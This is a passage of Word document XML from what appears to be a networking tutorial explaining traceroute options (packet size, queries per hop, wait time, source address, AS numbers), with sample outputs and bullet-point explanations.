    <w:p w14:paraId="5B2A92C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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D2047"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3  * * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC0AAD"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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92623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lastRenderedPageBreak/>
        <w:t>5  google-peer.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CFC4B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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB1C77" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343FD59A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1472 byte packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Large packet size to test MTU limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF23CA8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local router/gateway on LAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0DA5FD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP's first router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A5B427" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 3 (* * *)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Router not responding (firewall/security policy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCFC75" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 4-5</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP backbone infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746DE87F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Final destination (Google server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D41BB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three timing values</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Round-trip times for three probe packets per hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F647F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Large packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Help identify where packet fragmentation occurs in the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF3382" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Test path MTU discovery and fragmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF7ADC3" w14:textId="10DAB988" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Set number of queries per hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1D9C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q 1 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C42CB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB32A0"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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091E58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1  router.local (192.168.1.1)  1.234 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781FA88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2  10.0.0.1 (10.0.0.1)  8.234 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192767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3  isp-gateway.net (203.0.113.1)  15.234 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD712F0"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4  backbone1.isp.net (203.0.113.10)  22.234 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FE501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5  google-peer.net (203.0.113.30)  28.234 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253401A"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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECECC55" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E81BD22" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single timing value</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Only one probe packet sent per hop instead of three</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241B38C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Faster execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Completes trace more quickly with -q 1 option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91AE71" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same path visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Still shows all hops in the route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE01D0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.234 ms to 32.234 ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Increasing latency as packets travel further</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F87477" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local router (1 ms)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Very fast response from nearby gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61989BEC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ISP infrastructure (8-22 ms)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Normal latency through provider network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A28A65" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google servers (32 ms)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Final destination response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A4207B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Efficient tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Good balance between speed and information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777ED5B6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Faster trace with single packet per hop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9AED0" w14:textId="1AFF57AE" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Set wait time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514399A"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w 2 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F2B333" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D14E5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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B857B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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B0DE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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22519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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A18199"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4  * * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF59FB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5  google-peer.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC7D0D"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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6956528F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA14F0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-w 2 flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Sets wait time to 2 seconds per probe instead of default 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1FEA0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Faster timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Reduces waiting time for non-responsive routers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C205E3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 4 timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows asterisks faster when router doesn't respond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E688D10" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Other hops respond within 2-second timeout window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8701D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Improved efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Completes traceroute faster on slow/congested networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F1BF16" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same path visibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Still shows complete route to destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C6B75" w14:textId="3CF41D6C" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Use specific source address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF357B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s 192.168.1.100 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A17FA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6804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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3EEF2"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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78129AD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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC387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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A05819"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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F608994"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5  google-peer.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758ACC14"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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C408E2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395BC6A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-s 192.168.1.100</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Specifies source IP address for traceroute packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A0114" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-homed benefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Useful on systems with multiple network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B83C8D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source control</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Forces packets to originate from specific interface/IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F7B05D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same routing path</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows route from chosen source to destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663589AB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interface testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Helps test routing from different network connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF5391" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancing insight</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: May reveal different paths based on source IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65B17A" w14:textId="11525DF2" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Show AS numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5659F5"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A google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C5CE2B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C830A02"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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23C60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1  router.local (192.168.1.1) [AS????]  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197078B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2  10.0.0.1 (10.0.0.1) [AS65001]  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5037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3  isp-gateway.net (203.0.113.1) [AS65001]  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1C78A"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4  backbone1.isp.net (203.0.113.10) [AS65001]  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80C988"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5  google-peer.net (203.0.113.30) [AS15169]  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC03C6D"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6  lga25s62-in-f14.1e100.net (142.251.46.142) [AS15169]  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAE928" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F68EA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-A flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Displays Autonomous System (AS) numbers for each hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8BA7E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[AS????]</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local router with unknown/private AS number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177334F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[AS65001]</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP's AS number for their network infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F85F1B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
